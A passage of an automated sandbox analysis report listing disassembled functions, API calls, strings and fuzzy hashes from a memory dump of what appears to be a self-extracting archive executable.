                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 994f661b7b4c06e963349275c21d5b951ef71afbfdb196deb56eea320348e12f
                                      • Instruction ID: d781ad17d8834879a5a753d60a3e72bb57bab579d177c6a57b1684e82279b658
                                      • Opcode Fuzzy Hash: 994f661b7b4c06e963349275c21d5b951ef71afbfdb196deb56eea320348e12f
                                      • Instruction Fuzzy Hash: 1641C134A00219AFDF10DF68C885AEEBFB5FF45324F148055E819AB392D771DAA5CB90
                                      Function 00509955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 176396367-3743748572
                                      • Opcode ID: 4af15a5d9891ce94d8d1b9a6814e581049fb39d77fc63c5a258bffd1a806bf70
                                      • Instruction ID: 7e76015e7640bfc3132aa3745c02a2f9d89da1cb64569114727eaf442313e469
                                      • Opcode Fuzzy Hash: 4af15a5d9891ce94d8d1b9a6814e581049fb39d77fc63c5a258bffd1a806bf70
                                      • Instruction Fuzzy Hash: 6B31823274434666E630AB549C46BBF7BA4FBD0320F50881FF486472C5FB50AD8183A1
                                      Function 0050AAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0050AAD2
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                      • ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID: -P$7P$P
                                      • API String ID: 1429681911-3143175609
                                      • Opcode ID: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                      • Instruction ID: 2343409247252c83f4f4cb02b674fd91bed1b4aa558a6211b0023aed563473f2
                                      • Opcode Fuzzy Hash: ed69dac6dc0a45a3afcae435dbe4361b1c6cf8219ff37d746c7a245f6b207d30
                                      • Instruction Fuzzy Hash: 1A21FF72108304EFD3019F95DC4CD6FBFE9FB99392F040429FA4992170D7319A589B62
                                      Function 0051C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0051C868: _free.LIBCMT ref: 0051C891
                                      • _free.LIBCMT ref: 0051C8F2
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051C8FD
                                      • _free.LIBCMT ref: 0051C908
                                      • _free.LIBCMT ref: 0051C95C
                                      • _free.LIBCMT ref: 0051C967
                                      • _free.LIBCMT ref: 0051C972
                                      • _free.LIBCMT ref: 0051C97D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction ID: 81c02f0a9ce02debf75c760f98a40c291333e6ba815e5bb9a0b0d2f306b86fd9
                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction Fuzzy Hash: EF112CB1590B16BAF530B7B1CC4AFDB7FACBF80B00F400C19B29D66092DB66A585C750
                                      Function 004FC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                        • Part of subcall function 004FB92D: _wcsrchr.LIBVCRUNTIME ref: 004FB944
                                      • _wcslen.LIBCMT ref: 004FC197
                                      • _wcslen.LIBCMT ref: 004FC1DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcsrchr
                                      • String ID: .exe$.rar$.sfx
                                      • API String ID: 3513545583-31770016
                                      • Opcode ID: a4e8ecb54bb8ca5e8922ff3478037b2d36f0504d3037749b49daceb7786041d4
                                      • Instruction ID: 09d1e58e89f1e15122733c5d397c441e1b88c36210e4bd0a3ce4b91521089dc1
                                      • Opcode Fuzzy Hash: a4e8ecb54bb8ca5e8922ff3478037b2d36f0504d3037749b49daceb7786041d4
                                      • Instruction Fuzzy Hash: E641562150032E99C735AF708A96A7F77A8FF42704F10494FFA816B2C1EB584D92C39A
                                      Function 0050CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FB690: _wcslen.LIBCMT ref: 004FB696
                                      • _swprintf.LIBCMT ref: 0050CED1
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(?,00000066,0053946A), ref: 0050CEF1
                                      • _wcschr.LIBVCRUNTIME ref: 0050CF22
                                      • EndDialog.USER32(?,00000001), ref: 0050CFFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DialogItemText__vswprintf_c_l_swprintf_wcschr_wcslen
                                      • String ID: %s%s%u
                                      • API String ID: 3419047066-1360425832
                                      • Opcode ID: 492c19d2d0721032151b499cc9eae5179099e9f483a97c20faa0566f6c6e0c67
                                      • Instruction ID: 68f1a674d5c70db4a7e965e61dc83a5c63d84beb5d67631e7cb236785f830be3
                                      • Opcode Fuzzy Hash: 492c19d2d0721032151b499cc9eae5179099e9f483a97c20faa0566f6c6e0c67
                                      • Instruction Fuzzy Hash: 0941B0B1900659AADF219B90DC45BEE3BBCFB45300F4084A6FA09E7181EE708A44DF62
                                      Function 0050CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 0050CD84
                                        • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2691759472-3358265660
                                      • Opcode ID: 54d2db19514717eb9953078bdf3f4797fcbaf79411bb36a72b89ecd4a7137d69
                                      • Instruction ID: 1fb8535b80930d8498daca0d4365b675321a0268e603f3454895b31e3b6e6afb
                                      • Opcode Fuzzy Hash: 54d2db19514717eb9953078bdf3f4797fcbaf79411bb36a72b89ecd4a7137d69
                                      • Instruction Fuzzy Hash: 2431727290061A9ADF25CB50DC45AEE7FBCFB55350F004666E905E71C0EBB09A848FA1
                                      Function 0050B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050B2BE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0050B2D6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 0050B304
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1$xzT
                                      • API String ID: 445417207-2147243542
                                      • Opcode ID: a7b1192b820b91b94c6e9c115de66571d25db57d65ebb6a611859ff74410f6f8
                                      • Instruction ID: 8f5484d2d04f617062e76263396c74675ea5678ae6f291151ad95398b12620b0
                                      • Opcode Fuzzy Hash: a7b1192b820b91b94c6e9c115de66571d25db57d65ebb6a611859ff74410f6f8
                                      • Instruction Fuzzy Hash: AF11E132900219B6EB219A649C99FFF3B6CFF19744F100421FA45B20D0C7A49A049761
                                      Function 004FB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 004FB9B8
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _wcschr.LIBVCRUNTIME ref: 004FB9D6
                                      • _wcschr.LIBVCRUNTIME ref: 004FB9E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 6f8e52f8a3b2be49f3f88c80b7f068cd51fb87f5b38dad7b1da71db6a0f4f5a8
                                      • Instruction ID: a8d2d9e3e078e1850b7f8733492c01bbd0c8e84f435f55bf224ecb0dacd7f26a
                                      • Opcode Fuzzy Hash: 6f8e52f8a3b2be49f3f88c80b7f068cd51fb87f5b38dad7b1da71db6a0f4f5a8
                                      • Instruction Fuzzy Hash: EA01F5A350031669AA306B75DC46D7BABACEFD7770B40490FF754D6282EB38D89082F5
                                      Function 0050B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 0050B6ED
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0050B712
                                      • DeleteObject.GDI32(00000000), ref: 0050B744
                                      • DeleteObject.GDI32(00000000), ref: 0050B767
                                        • Part of subcall function 0050A6C2: GlobalAlloc.KERNELBASE(00000002,00000000), ref: 0050A72D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Object$Delete$AllocBitmapGlobalLoad
                                      • String ID: ]
                                      • API String ID: 399692894-3352871620
                                      • Opcode ID: 023481426d6c0f6877388e6437e519189a51d450ac2c7b72e93dde02373cbd0c
                                      • Instruction ID: 8d62dd9e2db7cb88ea0fb753fd40b2d583297a8d754e7c4723ec2a87164eeb95
                                      • Opcode Fuzzy Hash: 023481426d6c0f6877388e6437e519189a51d450ac2c7b72e93dde02373cbd0c
                                      • Instruction Fuzzy Hash: F501C436940306A7EB1277745C5DABF7EB9FFC0792F080010F900A72E1DF218D095662
                                      Function 0050D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050D64B
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0050D661
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050D675
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 0050D684
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 39f5cb056847a14f80a731501d173f1f860ccc8c9539bd83be7980cd75b33404
                                      • Instruction ID: 8bcea308c5580d035a632e24eeab5db6f998e2d6629e62d1d882cc8d2d98b56b
                                      • Opcode Fuzzy Hash: 39f5cb056847a14f80a731501d173f1f860ccc8c9539bd83be7980cd75b33404
                                      • Instruction Fuzzy Hash: 0D01B533284314BAD2114FA8AD0DF6F7F6DBB6AB42F110511F705A20E0C6A39908A775
                                      Function 00512BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AdjustPointer$_abort
                                      • String ID:
                                      • API String ID: 2252061734-0
                                      • Opcode ID: e42efe85729e87b098923dfc81030b6952c7c90e5d765c7511315d27fc503206
                                      • Instruction ID: de042f2e3a871ef64ae3f0776cf1d5a52a86f870e551c4a1427fbb9eb8697699
                                      • Opcode Fuzzy Hash: e42efe85729e87b098923dfc81030b6952c7c90e5d765c7511315d27fc503206
                                      • Instruction Fuzzy Hash: 6F51D0B1600216AFFB288F14E849BEA7FA4FF54314F24452DE901476A1E731EDE1D790
                                      Function 0051C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0051C817
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051C829
